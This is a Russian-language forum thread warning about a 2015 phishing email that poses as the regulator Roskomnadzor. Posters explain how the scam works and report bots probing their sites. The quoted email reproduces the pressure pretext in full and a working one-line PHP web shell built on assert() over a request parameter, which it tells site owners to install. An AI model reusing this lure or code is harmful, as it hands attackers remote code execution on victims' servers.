Осторожно мошенники)): Уведомление о внесении сайта в реестр

#1 27 августа 2015 в 12:44
Получил сегодня такое письмо.
В графе от кого значится zapret-info @ r oskomnadzor. org

Уведомление о внесении сайта в реестр организаторов распространения информации в сети «Интернет»

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени *** в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт *** был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени ***, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

  1. < ?php
  2. /*Подтверждение доменного имени ****/
  3. assert(stripslashes($_REQUEST[roskomnadzor]));
  4. ?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: ***/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ***, следую инструкции указанной выше, то Ваш сайт *** будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.

----------------------------------------------------------
Конечно видно что адрес отправителя не связан с Роскомнадзором, но при переходе на этот сайт roskomnadzor. org идет редирект на реальный сайт Роскомнадзора. Конечно это несколько усилило впечатление того что письмо настоящее.

Полез искать решение Новокуйбышевского суда города Самары, но нашел упоминания о новом виде мошенничества. Вот на хабр например habrahabr.ru/post/265515/


Как я понял, они хотят что бы владелец сайта собственноручно создал файл который станет дырой и позволит выполнять запросы?
Прошу просветить подробнее кто хорошо разбирается в php что можно сделать с тем php файлом который они предлагают создать и загрузить на хостинг?
#2 27 августа 2015 в 12:53
Можно будет выполнять код из переменной roskomnadzor
#3 27 августа 2015 в 12:55
Rossoman, то есть фактически доступ к ftp?
#4 28 августа 2015 в 03:19
Ктото мне уж говорил про эти письма, они архивируют все папки в корне, архивчег запороленный, а потом пароли продают)
#5 28 августа 2015 в 07:01


Rossoman, то есть фактически доступ к ftp?

Нил™
статья на хабре
#6 30 августа 2015 в 22:45
Заметил, что у меня на сайте проверили лазейку /reestr/reestr-id128032.php
Бот с неприметным User-agent'ом обычного браузера пытался открыть по этому адресу)
Правда предложений по установке дыры не поступало.
Видимо автоматом все сайты чешут.
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.